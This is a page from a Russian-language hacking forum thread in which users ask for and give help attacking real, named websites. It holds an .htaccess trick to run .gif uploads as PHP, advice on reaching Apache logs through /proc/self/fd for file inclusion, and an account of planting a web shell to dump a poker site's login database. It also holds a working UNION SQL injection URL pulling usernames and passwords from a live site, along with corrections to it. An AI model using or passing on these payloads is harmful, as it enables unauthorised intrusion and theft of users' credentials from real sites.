Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    есть возможность залить htaccess через админ-панель. как сделать так, чтобы сервер воспринимал gif-картинки как php-скрипты ?
     
  2. Sc0rpi0n

    Sc0rpi0n Banned

    Joined:
    23 Feb 2010
    Messages:
    75
    Likes Received:
    22
    Reputations:
    16
    AddType application/x-httpd-php .gif
     
    #12202 Sc0rpi0n, 6 Apr 2010
    Last edited: 5 Jun 2010
  3. mental2

    mental2 Elder - Старейшина

    Joined:
    13 Aug 2007
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Как думаете, реально раскрутить?
    http://starosti.ru/archive.php?m=10&y=1909'
     
  4. MuTANta

    MuTANta New Member

    Joined:
    6 Apr 2010
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Скажите от чего зависит цифра в имени ссылки на лог апача?
    /proc/self/fd/2
    /proc/self/fd/11

    мне нужно чтоб при инклуде сразу добраться до логов.
     
  5. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    http://www.yellowbulletin.com/backup/
    смотрите, может есть че нить ценное!
     
    #12205 Strilo4ka, 6 Apr 2010
    Last edited: 6 Apr 2010
  6. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    194
    Likes Received:
    195
    Reputations:
    91

    Это ярлыки.
    Логам апача вроде соответствуют 2 или 7.
     
  7. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    Как насчет идеи провести пен-тест обхода mysql_escape_string и htmlspecialchar с использованием многобайтных кодировок. Развеевание в паблике мифа в реальность! Если да, то многие двиги можна скомпроментировать (искажение данный или експлуатация разных уязвимостей!). Смотрю здесь сегодня собрание)
     
  8. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    194
    Likes Received:
    195
    Reputations:
    91

    Тесть:
    (эта функция уже не рекомендуется к использованию, а функция mysql_real_escape_string проверяет кодировку текущего соединения, так что у неё меньше проблем с подобным уязвимостями.)
    Code:
    /* {{{ proto string mysql_escape_string(string to_be_escaped)
       Escape string for mysql query */
    PHP_FUNCTION(mysql_escape_string)
    {
    	char *str;
    	int str_len;
    
    	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) {
    		return;
    	}
    
    	/* assume worst case situation, which is 2x of the original string.
    	 * we don't realloc() down to the real size since it'd most probably not
    	 * be worth it
    	 */
    
    	Z_STRVAL_P(return_value) = (char *) safe_emalloc(str_len, 2, 1);
    	Z_STRLEN_P(return_value) = mysql_escape_string(Z_STRVAL_P(return_value), str, str_len);
    	Z_TYPE_P(return_value) = IS_STRING;
    
    	if (MySG(trace_mode)){
    		php_error_docref("function.mysql-real-escape-string" TSRMLS_CC, E_DEPRECATED, "This function is deprecated; use mysql_real_escape_string() instead.");
    	}
    }
    /* }}} */
     
    #12208 Root-access, 7 Apr 2010
    Last edited: 7 Apr 2010
    1 person likes this.
  9. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,587
    Likes Received:
    405
    Reputations:
    196



    Не всегда есть доступ к логам таким образом же.
     
  10. MuTANta

    MuTANta New Member

    Joined:
    6 Apr 2010
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    ну когда есть .как узнать какая цифра и на какой лог ссылается ссыока
     
  11. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,587
    Likes Received:
    405
    Reputations:
    196
    последовательно, цифра за цифрой.
     
  12. MuTANta

    MuTANta New Member

    Joined:
    6 Apr 2010
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    отчего зависит цифра?
    на какой лог ссылается ссыока?
     
  13. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Народ.. тут Слепая MySQL injection 5'тая Версия...
    и не идет.. помогите плиз!
     
    _________________________
  14. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    так щас пишет что Сайт временно отключен
    наверное попалили
     
  15. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    нет так он и есть.. там 100% есть уязвимость
     
    _________________________
  16. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    Залил на один ресурс шелл от madneta
    прочитал файл msql-конфиг внём такая инфа

    objconn.Open "Provider=SQLOLEDB;Data Source=(Local);INITIAL Catalog=POKER; User Id=sa;Password=sas;"
    objconn.Open "Provider=SQLOLEDB;Data Source=(Local);INITIAL Catalog=POKER; User Id=sa;Password=ichsss;"

    Мне нужно слить базу логинов и пассов. Пытаюсь приконектиться к базе через шелл, localhost
    используя: логин: sa пасс:sas - не конектится, ошибка
    логин=sa;Password=ichsss - тоже самое

    попробывал зайти в каталог: С/msql_data_files/
    там лежат папки баз от других сайтов на этом хосте но папки POKER нет (
    В админку не залогиниться т.к. админ переименовал файл админки а в корневой папке ~500 файлов.
    Что посоветуете господа? Очень нужно слить базу, help somebody
    (новичок)
     
    #12216 Darren, 7 Apr 2010
    Last edited: 7 Apr 2010
  17. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,587
    Likes Received:
    405
    Reputations:
    196
    попробуй http://sourceforge.net/projects/phpmsadmin/files/
     
  18. гостъ

    гостъ New Member

    Joined:
    4 Jan 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Вобщем так, для ясности и на глядности что и где:

    Можешь посмотреть сначала на /proc/self/status на значение pid, если ты не понял то self ето ссылка на етот пид, обращайся на /proc/цыфра_которой_соответствует_pid/2, а там уже
    Code:
    ls -la /proc/цыфра_которой_соответствует_pid/fd/
    итого 0
    dr-x------ 2 apache apache  0 2010-04-07 14:04 ./
    dr-xr-xr-x 7 apache apache  0 2010-04-07 13:56 ../
    lr-x------ 1 apache apache 64 2010-04-07 14:04 0 -> /dev/null
    l-wx------ 1 apache apache 64 2010-04-07 14:04 1 -> /dev/null
    l-wx------ 1 apache apache 64 2010-04-07 14:04 2 -> /var/log/httpd/error_log
    
    ссылка на логи, а проинклудишь или нет, зависит от прав.:(

    UPD
    Кстате ты интересовался именно цыфрой, она от одмина не зависит, зависит только от количества логов который использует апач. Если хостинг апач с под пользоваетлся, на огромном хостинге то попадешь на 2, если с под апача туева куча то будешь искать, как подсказывает опыт.
     
    #12218 гостъ, 7 Apr 2010
    Last edited: 7 Apr 2010
  19. Slay90

    Slay90 Member

    Joined:
    12 Apr 2009
    Messages:
    146
    Likes Received:
    16
    Reputations:
    -5
    подобрал на сайте баблицу с логинами и пассами
    Code:
    http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x70687062625f7573657273--
    назнаю как извлечь user_id,username,user_password

    Code:
    http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3b,user_id,username,user_password)+from+information_schema.tables--
    вот так не получается(((((( подскажите пожалуйста!!! с меня +++ !!!
     
  20. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    289
    Reputations:
    195
    Тебе надо user_id, username и user_password тащить не из information_schema.tables, а из таблицы, которую ты указал в первом запросе
     
    #12220 h00lyshit!, 7 Apr 2010
    Last edited: 7 Apr 2010
Loading...
Thread Status:
Not open for further replies.